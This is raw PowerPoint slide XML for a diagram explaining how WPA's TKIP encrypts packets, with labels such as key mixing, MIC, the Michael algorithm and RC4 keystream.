                <a:gd name="T27" fmla="*/ 71002968 h 602"/>
                <a:gd name="T28" fmla="*/ 71002280 w 602"/>
                <a:gd name="T29" fmla="*/ 71002968 h 602"/>
                <a:gd name="T30" fmla="*/ 71002280 w 602"/>
                <a:gd name="T31" fmla="*/ 7308970 h 602"/>
                <a:gd name="T32" fmla="*/ 14748653 w 602"/>
                <a:gd name="T33" fmla="*/ 52599581 h 602"/>
                <a:gd name="T34" fmla="*/ 14748653 w 602"/>
                <a:gd name="T35" fmla="*/ 52599581 h 602"/>
                <a:gd name="T36" fmla="*/ 22188371 w 602"/>
                <a:gd name="T37" fmla="*/ 52599581 h 602"/>
                <a:gd name="T38" fmla="*/ 25842658 w 602"/>
                <a:gd name="T39" fmla="*/ 56254247 h 602"/>
                <a:gd name="T40" fmla="*/ 25842658 w 602"/>
                <a:gd name="T41" fmla="*/ 63563216 h 602"/>
                <a:gd name="T42" fmla="*/ 22188371 w 602"/>
                <a:gd name="T43" fmla="*/ 67348302 h 602"/>
                <a:gd name="T44" fmla="*/ 14748653 w 602"/>
                <a:gd name="T45" fmla="*/ 67348302 h 602"/>
                <a:gd name="T46" fmla="*/ 11094005 w 602"/>
                <a:gd name="T47" fmla="*/ 63563216 h 602"/>
                <a:gd name="T48" fmla="*/ 11094005 w 602"/>
                <a:gd name="T49" fmla="*/ 56254247 h 602"/>
                <a:gd name="T50" fmla="*/ 14748653 w 602"/>
                <a:gd name="T51" fmla="*/ 52599581 h 602"/>
                <a:gd name="T52" fmla="*/ 35109700 w 602"/>
                <a:gd name="T53" fmla="*/ 19317053 h 602"/>
                <a:gd name="T54" fmla="*/ 35109700 w 602"/>
                <a:gd name="T55" fmla="*/ 19317053 h 602"/>
                <a:gd name="T56" fmla="*/ 42418636 w 602"/>
                <a:gd name="T57" fmla="*/ 19317053 h 602"/>
                <a:gd name="T58" fmla="*/ 46073284 w 602"/>
                <a:gd name="T59" fmla="*/ 22971718 h 602"/>
                <a:gd name="T60" fmla="*/ 46073284 w 602"/>
                <a:gd name="T61" fmla="*/ 63563216 h 602"/>
                <a:gd name="T62" fmla="*/ 42418636 w 602"/>
                <a:gd name="T63" fmla="*/ 67348302 h 602"/>
                <a:gd name="T64" fmla="*/ 35109700 w 602"/>
                <a:gd name="T65" fmla="*/ 67348302 h 602"/>
                <a:gd name="T66" fmla="*/ 31324631 w 602"/>
                <a:gd name="T67" fmla="*/ 63563216 h 602"/>
                <a:gd name="T68" fmla="*/ 31324631 w 602"/>
                <a:gd name="T69" fmla="*/ 22971718 h 602"/>
                <a:gd name="T70" fmla="*/ 35109700 w 602"/>
                <a:gd name="T71" fmla="*/ 19317053 h 602"/>
                <a:gd name="T72" fmla="*/ 56253627 w 602"/>
                <a:gd name="T73" fmla="*/ 34065774 h 602"/>
                <a:gd name="T74" fmla="*/ 56253627 w 602"/>
                <a:gd name="T75" fmla="*/ 34065774 h 602"/>
                <a:gd name="T76" fmla="*/ 63693344 w 602"/>
                <a:gd name="T77" fmla="*/ 34065774 h 602"/>
                <a:gd name="T78" fmla="*/ 67347631 w 602"/>
                <a:gd name="T79" fmla="*/ 37850860 h 602"/>
                <a:gd name="T80" fmla="*/ 67347631 w 602"/>
                <a:gd name="T81" fmla="*/ 63563216 h 602"/>
                <a:gd name="T82" fmla="*/ 63693344 w 602"/>
                <a:gd name="T83" fmla="*/ 67348302 h 602"/>
                <a:gd name="T84" fmla="*/ 56253627 w 602"/>
                <a:gd name="T85" fmla="*/ 67348302 h 602"/>
                <a:gd name="T86" fmla="*/ 52598978 w 602"/>
                <a:gd name="T87" fmla="*/ 63563216 h 602"/>
                <a:gd name="T88" fmla="*/ 52598978 w 602"/>
                <a:gd name="T89" fmla="*/ 37850860 h 602"/>
                <a:gd name="T90" fmla="*/ 56253627 w 602"/>
                <a:gd name="T91" fmla="*/ 34065774 h 60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02" h="602">
                  <a:moveTo>
                    <a:pt x="573" y="601"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="573" y="601"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="601"/>
                    <a:pt x="28" y="601"/>
                    <a:pt x="28" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="601"/>
                    <a:pt x="0" y="586"/>
                    <a:pt x="0" y="572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7"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="28" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="573" y="0"/>
                    <a:pt x="573" y="0"/>
                    <a:pt x="573" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="0"/>
                    <a:pt x="601" y="7"/>
                    <a:pt x="601" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="572"/>
                    <a:pt x="601" y="572"/>
                    <a:pt x="601" y="572"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="586"/>
                    <a:pt x="587" y="601"/>
                    <a:pt x="573" y="601"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="544" y="56"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="544" y="56"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="56"/>
                    <a:pt x="57" y="56"/>
                    <a:pt x="57" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="544"/>
                    <a:pt x="57" y="544"/>
                    <a:pt x="57" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="544"/>
                    <a:pt x="544" y="544"/>
                    <a:pt x="544" y="544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="544" y="56"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="113" y="403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113" y="403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="403"/>
                    <a:pt x="170" y="403"/>
                    <a:pt x="170" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="403"/>
                    <a:pt x="198" y="417"/>
                    <a:pt x="198" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="487"/>
                    <a:pt x="198" y="487"/>
                    <a:pt x="198" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="502"/>
                    <a:pt x="184" y="516"/>
                    <a:pt x="170" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="516"/>
                    <a:pt x="113" y="516"/>
                    <a:pt x="113" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="516"/>
                    <a:pt x="85" y="502"/>
                    <a:pt x="85" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="431"/>
                    <a:pt x="85" y="431"/>
                    <a:pt x="85" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="417"/>
                    <a:pt x="92" y="403"/>
                    <a:pt x="113" y="403"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="269" y="148"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269" y="148"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="148"/>
                    <a:pt x="325" y="148"/>
                    <a:pt x="325" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="148"/>
                    <a:pt x="353" y="162"/>
                    <a:pt x="353" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="487"/>
                    <a:pt x="353" y="487"/>
                    <a:pt x="353" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="502"/>
                    <a:pt x="346" y="516"/>
                    <a:pt x="325" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="516"/>
                    <a:pt x="269" y="516"/>
                    <a:pt x="269" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="516"/>
                    <a:pt x="240" y="502"/>
                    <a:pt x="240" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="176"/>
                    <a:pt x="240" y="176"/>
                    <a:pt x="240" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="162"/>
                    <a:pt x="255" y="148"/>
                    <a:pt x="269" y="148"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="431" y="261"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="431" y="261"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="261"/>
                    <a:pt x="488" y="261"/>
                    <a:pt x="488" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="502" y="261"/>
                    <a:pt x="516" y="276"/>
                    <a:pt x="516" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="516" y="487"/>
                    <a:pt x="516" y="487"/>
                    <a:pt x="516" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="516" y="502"/>
                    <a:pt x="502" y="516"/>
                    <a:pt x="488" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="516"/>
                    <a:pt x="431" y="516"/>
                    <a:pt x="431" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="516"/>
                    <a:pt x="403" y="502"/>
                    <a:pt x="403" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403" y="290"/>
                    <a:pt x="403" y="290"/>
                    <a:pt x="403" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403" y="276"/>
                    <a:pt x="417" y="261"/>
                    <a:pt x="431" y="261"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3388BC"/>
            </a:solidFill>
            <a:ln>
              <a:noFill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8" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC49DC2B-A98C-4CE3-A255-AA61B2FE405B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552035" y="1082037"/>
            <a:ext cx="10666091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WPA is a security protocol defined by 802.11i standards; it uses a Temporal Key Integrity Protocol (TKIP) that utilizes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RC4 stream cipher encryption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with 128-bit keys and 64-bit MIC integrity check to provide stronger encryption and authentication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401F5B22-DDBF-49A1-9F0F-56A1F413C24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538969" y="2133605"/>
            <a:ext cx="10317604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WPA uses TKIP to eliminate the weaknesses of WEP by including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per-packet mixing functions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message integrity checks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extended initialization vectors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and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re-keying mechanisms</a:t>
            </a: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B21C0C06-E7F0-42C2-BBAD-C0ADA2D71008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2043609" y="3305799"/>
            <a:ext cx="9874587" cy="2923548"/>
            <a:chOff x="1967506" y="3079114"/>
            <a:chExt cx="9776819" cy="3360542"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61712CCA-2337-47D5-933E-C3567D666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6494" y="3377314"/>
              <a:ext cx="1524459" cy="761543"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot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B9269B11-A93F-49B5-98D3-5CE0247BA3CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6035010" y="3079114"/>
              <a:ext cx="1232313" cy="31840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 to Transmit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B2E0B7-3D40-4CB5-9F0E-74FED2AD5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39319" y="5741682"/>
              <a:ext cx="4005006" cy="406669"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot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8" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA0994A9-271A-4DA5-A76F-2D5F984C1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87350" y="3607216"/>
              <a:ext cx="1365216" cy="301736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9" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE37903-4158-45B7-A9F3-A44844D31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23573" y="5741682"/>
              <a:ext cx="1478150" cy="410697"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot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0" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F49357B-EF3D-4CF9-83FC-F919DD205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3456" y="4854152"/>
              <a:ext cx="1757009" cy="377738"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot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1" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC73961-1589-46B9-8A57-82D0ED89C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7506" y="3386868"/>
              <a:ext cx="1998836" cy="1133102"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot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pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Picture 41" descr="one2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EDBECD-45DF-45D3-81BF-232C9F3BBDDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0">
              <a:picLocks noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2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94696" y="3644685"/>
              <a:ext cx="617467" cy="61746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AB40AF50-264A-442E-BCE8-159AD3B4B8E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4484641" y="3693580"/>
              <a:ext cx="629193" cy="49529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Key Mixing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="Straight Arrow Connector 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DD336D-4092-4ED5-AC01-5C578726FA28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7432420" y="3758084"/>
              <a:ext cx="896419" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Elbow Connector 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6582BF16-E2BC-4912-AD68-8AE96F6C71CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="6162647" y="4360009"/>
              <a:ext cx="4119882" cy="528039"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100039"/>
              </a:avLst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Elbow Connector 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3068E7F0-5FC9-46E7-9A20-45D5A16C68CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6857583" y="5495053"/>
              <a:ext cx="4241056" cy="268211"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/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a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922AE5A8-A58F-4020-98AF-660D3269F005}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013214" y="5919506"/>
              <a:ext cx="887121" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Arrow Connector 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93E6D30-0D6E-402F-93FB-A7B94BFA7C7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4803429" y="5072385"/>
              <a:ext cx="0" cy="591511"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Arrow Connector 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53F65C5C-50DD-485F-A16E-06C9A7ED28BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4803429" y="4260168"/>
              <a:ext cx="0" cy="476481"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAD1D09A-1BA2-4FAB-8216-C7CE3EE12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4963" y="4758457"/>
              <a:ext cx="1396933" cy="301736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F05128F3-1997-40A6-AC31-85D4B8CA8094}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4400139" y="4750124"/>
              <a:ext cx="806580" cy="31840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WEP seed</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02DFC28C-6540-4EE8-BC1F-A54272E14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0611" y="3433143"/>
              <a:ext cx="1365216" cy="301736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3" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4088A791-E5BF-4A79-A9C9-CA1A11078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0611" y="3787275"/>
              <a:ext cx="1365216" cy="301736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D60A78CA-E522-4968-BB97-91311FC0ACC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6367718" y="3424810"/>
              <a:ext cx="584381" cy="31840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MSDU</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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DB09F1BA-D136-4683-9A4F-4F78B4EFD299}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6340075" y="3778942"/>
              <a:ext cx="688307" cy="31840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MIC key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197CE2CF-0A06-47D0-A37B-2320B3139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8925" y="4891377"/>
              <a:ext cx="557747" cy="301736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7" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B07F95-B474-41B9-B46D-076750851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7249" y="4891377"/>
              <a:ext cx="1026601" cy="301736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882458D9-FDE2-4EB3-A672-2DD4AFFB6BD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6043596" y="4884598"/>
              <a:ext cx="593904" cy="31840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MPDU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6E332D67-00EE-4832-ABA1-036A54F82727}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6980040" y="4884598"/>
              <a:ext cx="395513" cy="31840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ICV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54830CC4-FC32-49CF-82E4-2E1E92211952}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5678858" y="5335143"/>
              <a:ext cx="1006559" cy="29187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XOR Algorithm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17297170-748D-49AD-AA17-E34D332F9DB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10327502" y="6121253"/>
              <a:ext cx="1333190" cy="31840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Packet to transmit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1821A391-0C51-4B51-870D-2456F7066B01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10076994" y="3598884"/>
              <a:ext cx="985926" cy="31840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MSDU + MIC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EDB943E-F861-4FBB-A4FB-A89212FF05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0041" y="5793585"/>
              <a:ext cx="1365216" cy="301736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F9CFC4CE-3D36-47D2-B5F2-E2BD69356EEB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6239011" y="5787828"/>
              <a:ext cx="847274" cy="318403"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:noFill/>
              <a:prstDash val="sysDot"/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Keystream</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="65" name="Straight Arrow Connector 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09FB3B1C-8078-4CA0-86E9-972DED6002D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="41" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3966342" y="3953419"/>
              <a:ext cx="554642" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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6" name="Picture 65" descr="one2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39045E3-03DB-4199-B32A-683074D715C4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348292" y="3449351"/>
              <a:ext cx="617467" cy="61746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7" name="Picture 66" descr="one1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9AAB35C-D8C8-47CD-9ED4-F38139F81555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4" cstate="print">
              <a:duotone>
                <a:schemeClr val="accent5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4494696" y="5651704"/>
              <a:ext cx="617467" cy="61746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9F6FDD1F-8E95-480B-A77F-91A119B08F69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8303405" y="3545814"/>
              <a:ext cx="707242" cy="42453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Michael Algorithm</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="69" name="Straight Arrow Connector 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E80ED9-B639-4C17-B2A6-0831D5FA5F39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8957030" y="3758084"/>
              <a:ext cx="924252" cy="62"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
